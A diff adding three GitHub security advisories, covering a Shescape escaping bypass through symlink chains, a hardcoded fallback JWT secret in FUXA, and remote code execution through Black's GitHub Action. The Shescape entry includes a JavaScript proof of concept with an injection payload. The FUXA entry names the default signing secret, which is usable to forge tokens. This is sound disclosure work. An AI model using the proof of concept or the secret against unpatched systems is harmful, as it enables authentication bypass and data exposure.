Publish Advisories

GHSA-6f6w-6j58-rq76
GHSA-c8m8-3jcr-6rj5
GHSA-v53h-f6m7-xcgm

Author: advisory-database[bot]

advisories/github-reviewed/2026/03/GHSA-6f6w-6j58-rq76/GHSA-6f6w-6j58-rq76.json

@@ -0,0 +1,66 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-6f6w-6j58-rq76",
+  "modified": "2026-03-07T02:31:58Z",
+  "published": "2026-03-07T02:31:58Z",
+  "aliases": [],
+  "summary": "Shescape has possible misidentification of shell due to link chains",
+  "details": "### Impact\n\nThis impacts users of Shescape that configure their `shell` to point to a file on disk that is a link to a link. The precise result of being affected depends on the actual shell used and incorrect shell identified by Shescape.\n\nIn particular, an attacker may be able to bypass escaping for the shell being used. This can result, for example, in exposure of sensitive information, consider the following proof of concept (targeting Shescape v2):\n\n```javascript\nimport fs from \"node:fs\";\nimport { exec } from \"node:child_process\";\n\nimport { Shescape } from \"shescape\";\nimport which from \"which\";\n\n/* 1. Set up */\nconst shell = which.sync(\"bash\");\nconst linkToShell = \"./csh\";\nconst linkToLink = \"./link\";\n\nfs.rmSync(linkToLink, { force: true });\nfs.rmSync(linkToShell, { force: true });\nfs.symlinkSync(shell, linkToShell);\nfs.symlinkSync(linkToShell, linkToLink);\n\n/* 2. Misconfiguration */\nconst execOptions = {\n  shell: linkToLink,\n};\n\nconst shescape = new Shescape({\n  shell: execOptions.shell,\n});\n\n/* 3. Payload */\nconst userInput = \"a=:~\";\n\n/* 4. Attack example */\nexec(\n  `echo Hello ${shescape.escape(userInput)}`,\n  { shell: execOptions.shell },\n  (error, stdout) => {\n    fs.rmSync(linkToLink);\n    fs.rmSync(linkToShell);\n\n    if (error) {\n      console.error(`An error occurred: ${error}`);\n    } else {\n      console.log(stdout);\n      // Output:  \"Hello a=:/home/user\"\n    }\n  },\n);\n```\n\n### Patches\n\nThis problem has been patched in [v2.1.9](https://www.npmjs.com/package/shescape/v/2.1.9) which you can upgrade to now.\n\n### Workarounds\n\nIf upgrading is not an option, either avoid using a shell or make sure the shell path you use is not a link to a link.\n\n### Resources\n\n- Shescape Pull Request [#2388](https://github.com/ericcornelissen/shescape/pull/2388)\n- Shescape Release [v2.1.9](https://github.com/ericcornelissen/shescape/releases/tag/v2.1.9)\n\n### For more information\n\n- Comment on Pull Request [#2388](https://github.com/ericcornelissen/shescape/pull/2388)\n- Open an issue at <https://github.com/ericcornelissen/shescape/issues> (New issue > Question)",
+  "severity": [
+    {
+      "type": "CVSS_V4",
+      "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "npm",
+        "name": "shescape"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "2.1.9"
+            }
+          ]
+        }
+      ],
+      "database_specific": {
+        "last_known_affected_version_range": "<= 2.1.8"
+      }
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/ericcornelissen/shescape/security/advisories/GHSA-6f6w-6j58-rq76"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/ericcornelissen/shescape/pull/2388"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/ericcornelissen/shescape"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/ericcornelissen/shescape/releases/tag/v2.1.9"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-200"
+    ],
+    "severity": "LOW",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-03-07T02:31:58Z",
+    "nvd_published_at": null
+  }
+}

advisories/github-reviewed/2026/03/GHSA-c8m8-3jcr-6rj5/GHSA-c8m8-3jcr-6rj5.json

@@ -0,0 +1,58 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-c8m8-3jcr-6rj5",
+  "modified": "2026-03-07T02:31:18Z",
+  "published": "2026-03-07T02:31:18Z",
+  "aliases": [],
+  "summary": "FUXA has a hardcoded fallback JWT signing secret",
+  "details": "FUXA used a static fallback JWT signing secret (`frangoteam751`) when no `secretCode` was configured.\n\nIf authentication was enabled without explicitly setting a custom secret, an attacker who knew the default value could forge valid JWT tokens and bypass authentication.\n\nThis issue has been addressed in version 1.3.0 by removing the static fallback and generating a secure random secret when no `secretCode` is provided.",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "npm",
+        "name": "@frangoteam/fuxa"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "1.3.0"
+            }
+          ]
+        }
+      ],
+      "database_specific": {
+        "last_known_affected_version_range": "<= 1.2.11"
+      }
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/frangoteam/FUXA/security/advisories/GHSA-c8m8-3jcr-6rj5"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/frangoteam/FUXA"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-321"
+    ],
+    "severity": "HIGH",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-03-07T02:31:18Z",
+    "nvd_published_at": null
+  }
+}

advisories/github-reviewed/2026/03/GHSA-v53h-f6m7-xcgm/GHSA-v53h-f6m7-xcgm.json

@@ -0,0 +1,59 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-v53h-f6m7-xcgm",
+  "modified": "2026-03-07T02:32:27Z",
+  "published": "2026-03-07T02:32:27Z",
+  "aliases": [],
+  "summary": "Black's vulnerable version parsing leads to RCE in GitHub Action",
+  "details": "### Impact\n\nBlack provides a [GitHub action](https://black.readthedocs.io/en/stable/integrations/github_actions.html) for formatting code. This action supports an option, `use_pyproject: true`, for reading the version of Black to use from the repository `pyproject.toml`. A malicious pull request could edit pyproject.toml to use a direct URL reference to a malicious repository. This could lead to arbitrary code execution in the context of the GitHub Action. Attackers could then gain access to secrets or permissions available in the context of the action.\n\n### Patches\n\nVersion 26.3.0 fixes this vulnerability by tightening the validation of the `version` field. Users who use the GitHub Action as `psf/black@stable` will automatically pick up this update.\n\n### Workarounds\n\nDo not use the `use_pyproject: true` option in the psf/black GitHub Action.",
+  "severity": [
+    {
+      "type": "CVSS_V4",
+      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "GitHub Actions",
+        "name": "psf/black"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "26.3.0"
+            }
+          ]
+        }
+      ]
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/psf/black/security/advisories/GHSA-v53h-f6m7-xcgm"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/psf/black/commit/0a2560b981364dde4c8cf8ce9d164c40669a8611"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/psf/black"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-20"
+    ],
+    "severity": "HIGH",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-03-07T02:32:27Z",
+    "nvd_published_at": null
+  }
+}